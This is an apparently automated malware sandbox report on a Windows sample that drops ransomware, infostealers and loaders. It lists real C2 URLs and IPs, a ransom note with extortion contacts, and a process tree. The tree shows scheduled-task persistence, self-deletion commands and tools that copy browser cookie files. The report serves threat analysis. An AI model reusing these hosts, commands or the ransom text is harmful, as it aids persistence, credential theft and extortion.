Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    1801s
  • max time network
    1815s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    28-07-2021 23:01

General

  • Target

    8 (10).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. To be sure we have the decryptor and it works you can send an email: [email protected] and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? Write to email: [email protected] telegram @udacha123yes 100$=24 hour Attention !!! in 24 hours the price will increase 3 times !!! have time to pay Your personal ID: 2A9-615-8BD Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

1k_TEST

C2

86.106.181.209:18845

Extracted

Family

redline

Botnet

NEW_5k

C2

86.106.181.209:18845

Extracted

Family

redline

Botnet

28_7_r

C2

zertypelil.xyz:80

Extracted

Family

vidar

Version

39.8

Botnet

865

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    865

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Buran

    Ransomware-as-a-service based on the VegaLocker family first identified in 2019.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • LimeRAT

    Simple yet powerful RAT for Windows machines written in .NET.

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • suricata: ET MALWARE Win32/Kelihos.F exe Download 2
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 3 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 37 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Drops desktop.ini file(s) 3 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 10 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 12 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 10 IoCs
  • Checks SCSI registry key(s) 3 TTPs 30 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 9 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 6 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 8 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 28 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 13 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:1004
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
      1⤵
      • Drops file in System32 directory
      PID:1040
      • C:\Users\Admin\AppData\Roaming\jwirchs
        C:\Users\Admin\AppData\Roaming\jwirchs
        2⤵
        • Loads dropped DLL
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:2460
      • C:\ProgramData\Provisioning\settings.exe
        C:\ProgramData\Provisioning\settings.exe
        2⤵
          PID:5036
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
            3⤵
            • Creates scheduled task(s)
            PID:4168
        • C:\Users\Admin\AppData\Roaming\ftirchs
          C:\Users\Admin\AppData\Roaming\ftirchs
          2⤵
          • Suspicious use of SetThreadContext
          PID:5564
          • C:\Users\Admin\AppData\Roaming\ftirchs
            C:\Users\Admin\AppData\Roaming\ftirchs
            3⤵
            • Checks SCSI registry key(s)
            • Suspicious behavior: MapViewOfSection
            PID:2456
        • C:\Users\Admin\AppData\Roaming\fvirchs
          C:\Users\Admin\AppData\Roaming\fvirchs
          2⤵
          • Loads dropped DLL
          • Checks SCSI registry key(s)
          • Suspicious behavior: MapViewOfSection
          PID:4760
        • C:\Users\Admin\AppData\Roaming\jwirchs
          C:\Users\Admin\AppData\Roaming\jwirchs
          2⤵
          • Loads dropped DLL
          • Checks SCSI registry key(s)
          • Suspicious behavior: MapViewOfSection
          PID:1468
        • C:\ProgramData\Provisioning\settings.exe
          C:\ProgramData\Provisioning\settings.exe
          2⤵
            PID:5528
            • C:\Windows\system32\schtasks.exe
              schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
              3⤵
              • Creates scheduled task(s)
              PID:4732
          • C:\ProgramData\Provisioning\settings.exe
            C:\ProgramData\Provisioning\settings.exe
            2⤵
              PID:2664
              • C:\Windows\system32\schtasks.exe
                schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                3⤵
                • Creates scheduled task(s)
                PID:5608
            • C:\Users\Admin\AppData\Roaming\ftirchs
              C:\Users\Admin\AppData\Roaming\ftirchs
              2⤵
              • Suspicious use of SetThreadContext
              PID:2376
              • C:\Users\Admin\AppData\Roaming\ftirchs
                C:\Users\Admin\AppData\Roaming\ftirchs
                3⤵
                • Checks SCSI registry key(s)
                • Suspicious behavior: MapViewOfSection
                PID:5364
            • C:\Users\Admin\AppData\Roaming\fvirchs
              C:\Users\Admin\AppData\Roaming\fvirchs
              2⤵
              • Loads dropped DLL
              • Checks SCSI registry key(s)
              • Suspicious behavior: MapViewOfSection
              PID:4128
            • C:\Users\Admin\AppData\Roaming\jwirchs
              C:\Users\Admin\AppData\Roaming\jwirchs
              2⤵
              • Loads dropped DLL
              • Checks SCSI registry key(s)
              • Suspicious behavior: MapViewOfSection
              PID:4388
            • C:\ProgramData\Provisioning\settings.exe
              C:\ProgramData\Provisioning\settings.exe
              2⤵
                PID:5600
                • C:\Windows\system32\schtasks.exe
                  schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                  3⤵
                  • Creates scheduled task(s)
                  PID:4184
              • C:\ProgramData\Provisioning\settings.exe
                C:\ProgramData\Provisioning\settings.exe
                2⤵
                  PID:5612
                  • C:\Windows\system32\schtasks.exe
                    schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                    3⤵
                    • Creates scheduled task(s)
                    PID:4464
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Browser
                1⤵
                  PID:2704
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                  1⤵
                    PID:2436
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                    1⤵
                      PID:2420
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                      1⤵
                        PID:2260
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                        1⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2240
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                        1⤵
                        • Modifies registry class
                        PID:1880
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s SENS
                        1⤵
                          PID:1412
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                          1⤵
                            PID:1384
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s Themes
                            1⤵
                              PID:1184
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                              1⤵
                                PID:1136
                              • C:\Users\Admin\AppData\Local\Temp\8 (10).exe
                                "C:\Users\Admin\AppData\Local\Temp\8 (10).exe"
                                1⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4064
                                • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:2184
                                  • C:\Users\Admin\AppData\Local\Temp\7zS888D4164\setup_install.exe
                                    "C:\Users\Admin\AppData\Local\Temp\7zS888D4164\setup_install.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Suspicious use of WriteProcessMemory
                                    PID:2536
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c sonia_3.exe
                                      4⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:3340
                                      • C:\Users\Admin\AppData\Local\Temp\7zS888D4164\sonia_3.exe
                                        sonia_3.exe
                                        5⤵
                                        • Executes dropped EXE
                                        • Modifies system certificate store
                                        PID:3228
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3228 -s 928
                                          6⤵
                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                          • Program crash
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4812
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c sonia_4.exe
                                      4⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:1096
                                      • C:\Users\Admin\AppData\Local\Temp\7zS888D4164\sonia_4.exe
                                        sonia_4.exe
                                        5⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3908
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c sonia_5.exe
                                      4⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:3412
                                      • C:\Users\Admin\AppData\Local\Temp\7zS888D4164\sonia_5.exe
                                        sonia_5.exe
                                        5⤵
                                        • Executes dropped EXE
                                        PID:384
                                        • C:\Users\Admin\Documents\2e_Il091SkxYBeoP2irEExyU.exe
                                          "C:\Users\Admin\Documents\2e_Il091SkxYBeoP2irEExyU.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Checks BIOS information in registry
                                          • Checks whether UAC is enabled
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:3836
                                        • C:\Users\Admin\Documents\lfSQDRMBKfHZe4avLt8qWrvh.exe
                                          "C:\Users\Admin\Documents\lfSQDRMBKfHZe4avLt8qWrvh.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          PID:5116
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            7⤵
                                            • Executes dropped EXE
                                            PID:1304
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            7⤵
                                              PID:5820
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              7⤵
                                                PID:5664
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                7⤵
                                                  PID:4316
                                              • C:\Users\Admin\Documents\R5OQnenhrCJCW_wS4hVXyo78.exe
                                                "C:\Users\Admin\Documents\R5OQnenhrCJCW_wS4hVXyo78.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5104
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                  7⤵
                                                    PID:5612
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im chrome.exe
                                                      8⤵
                                                      • Kills process with taskkill
                                                      PID:5912
                                                • C:\Users\Admin\Documents\7wZveWB_nou3d_ubKB4QEo7Q.exe
                                                  "C:\Users\Admin\Documents\7wZveWB_nou3d_ubKB4QEo7Q.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  PID:5092
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\7833849753.exe"
                                                    7⤵
                                                      PID:5536
                                                      • C:\Users\Admin\AppData\Local\Temp\7833849753.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\7833849753.exe"
                                                        8⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Checks processor information in registry
                                                        PID:5792
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im 7833849753.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7833849753.exe" & del C:\ProgramData\*.dll & exit
                                                          9⤵
                                                            PID:5272
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /im 7833849753.exe /f
                                                              10⤵
                                                              • Kills process with taskkill
                                                              PID:5976
                                                            • C:\Windows\SysWOW64\timeout.exe
                                                              timeout /t 6
                                                              10⤵
                                                              • Delays execution with timeout.exe
                                                              PID:5516
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\4288665837.exe"
                                                        7⤵
                                                          PID:5568
                                                          • C:\Users\Admin\AppData\Local\Temp\4288665837.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\4288665837.exe"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:196
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "7wZveWB_nou3d_ubKB4QEo7Q.exe" /f & erase "C:\Users\Admin\Documents\7wZveWB_nou3d_ubKB4QEo7Q.exe" & exit
                                                          7⤵
                                                            PID:588
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /im "7wZveWB_nou3d_ubKB4QEo7Q.exe" /f
                                                              8⤵
                                                              • Kills process with taskkill
                                                              PID:5504
                                                        • C:\Users\Admin\Documents\sIE3hrIbHhgFR4JcrC2VU22G.exe
                                                          "C:\Users\Admin\Documents\sIE3hrIbHhgFR4JcrC2VU22G.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          PID:5080
                                                        • C:\Users\Admin\Documents\o3fRUr35HjRPa8eokDsinWNB.exe
                                                          "C:\Users\Admin\Documents\o3fRUr35HjRPa8eokDsinWNB.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          PID:2640
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2640 -s 664
                                                            7⤵
                                                            • Program crash
                                                            PID:1048
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2640 -s 676
                                                            7⤵
                                                            • Program crash
                                                            • Checks processor information in registry
                                                            • Modifies registry class
                                                            PID:4280
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2640 -s 636
                                                            7⤵
                                                            • Program crash
                                                            PID:4524
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2640 -s 240
                                                            7⤵
                                                            • Program crash
                                                            PID:2976
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2640 -s 1120
                                                            7⤵
                                                            • Program crash
                                                            PID:5136
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2640 -s 1100
                                                            7⤵
                                                            • Program crash
                                                            PID:5240
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2640 -s 1152
                                                            7⤵
                                                            • Program crash
                                                            PID:5596
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2640 -s 1164
                                                            7⤵
                                                            • Program crash
                                                            PID:5732
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im "o3fRUr35HjRPa8eokDsinWNB.exe" /f & erase "C:\Users\Admin\Documents\o3fRUr35HjRPa8eokDsinWNB.exe" & exit
                                                            7⤵
                                                              PID:6020
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /im "o3fRUr35HjRPa8eokDsinWNB.exe" /f
                                                                8⤵
                                                                • Kills process with taskkill
                                                                PID:5152
                                                          • C:\Users\Admin\Documents\_mVyEodYow9Toz5NCcxmEPU0.exe
                                                            "C:\Users\Admin\Documents\_mVyEodYow9Toz5NCcxmEPU0.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:4288
                                                            • C:\Users\Admin\Documents\_mVyEodYow9Toz5NCcxmEPU0.exe
                                                              C:\Users\Admin\Documents\_mVyEodYow9Toz5NCcxmEPU0.exe
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:4700
                                                          • C:\Users\Admin\Documents\uu_35JuORIF2NO8vGV_mCa_5.exe
                                                            "C:\Users\Admin\Documents\uu_35JuORIF2NO8vGV_mCa_5.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:1348
                                                            • C:\Users\Admin\Documents\uu_35JuORIF2NO8vGV_mCa_5.exe
                                                              C:\Users\Admin\Documents\uu_35JuORIF2NO8vGV_mCa_5.exe
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:4920
                                                          • C:\Users\Admin\Documents\hXpVZPjvpIiuOP3WWS7hfden.exe
                                                            "C:\Users\Admin\Documents\hXpVZPjvpIiuOP3WWS7hfden.exe"
                                                            6⤵
                                                              PID:2876
                                                              • C:\Users\Admin\Documents\hXpVZPjvpIiuOP3WWS7hfden.exe
                                                                C:\Users\Admin\Documents\hXpVZPjvpIiuOP3WWS7hfden.exe
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:3484
                                                              • C:\Users\Admin\Documents\hXpVZPjvpIiuOP3WWS7hfden.exe
                                                                C:\Users\Admin\Documents\hXpVZPjvpIiuOP3WWS7hfden.exe
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:4372
                                                            • C:\Users\Admin\Documents\yyNSfq5hsjwTwRxJVkYO5lt7.exe
                                                              "C:\Users\Admin\Documents\yyNSfq5hsjwTwRxJVkYO5lt7.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              PID:4308
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\yyNSfq5hsjwTwRxJVkYO5lt7.exe"
                                                                7⤵
                                                                  PID:5204
                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                    timeout /T 10 /NOBREAK
                                                                    8⤵
                                                                    • Delays execution with timeout.exe
                                                                    PID:940
                                                              • C:\Users\Admin\Documents\nVD95FLWxtObgAluE3Ely6TO.exe
                                                                "C:\Users\Admin\Documents\nVD95FLWxtObgAluE3Ely6TO.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                PID:4624
                                                                • C:\Users\Admin\Documents\nVD95FLWxtObgAluE3Ely6TO.exe
                                                                  "C:\Users\Admin\Documents\nVD95FLWxtObgAluE3Ely6TO.exe" -a
                                                                  7⤵
                                                                    PID:3288
                                                                • C:\Users\Admin\Documents\5phtB6bewloqGEv14r830yZA.exe
                                                                  "C:\Users\Admin\Documents\5phtB6bewloqGEv14r830yZA.exe"
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:4468
                                                                  • C:\Users\Admin\Documents\5phtB6bewloqGEv14r830yZA.exe
                                                                    "C:\Users\Admin\Documents\5phtB6bewloqGEv14r830yZA.exe"
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    • Checks SCSI registry key(s)
                                                                    • Suspicious behavior: MapViewOfSection
                                                                    PID:4452
                                                                • C:\Users\Admin\Documents\GgwocAxlfqqnSOyKnraPCC1W.exe
                                                                  "C:\Users\Admin\Documents\GgwocAxlfqqnSOyKnraPCC1W.exe"
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  PID:4224
                                                                  • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                    "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    PID:4200
                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      8⤵
                                                                      • Executes dropped EXE
                                                                      PID:6032
                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                      8⤵
                                                                      • Executes dropped EXE
                                                                      PID:1828
                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      8⤵
                                                                      • Executes dropped EXE
                                                                      PID:5892
                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                      8⤵
                                                                      • Executes dropped EXE
                                                                      PID:6088
                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      8⤵
                                                                      • Executes dropped EXE
                                                                      PID:3964
                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                      8⤵
                                                                        PID:5936
                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        8⤵
                                                                          PID:2468
                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                          8⤵
                                                                            PID:496
                                                                        • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                          "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          • Checks whether UAC is enabled
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:2876
                                                                        • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                          "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          PID:1848
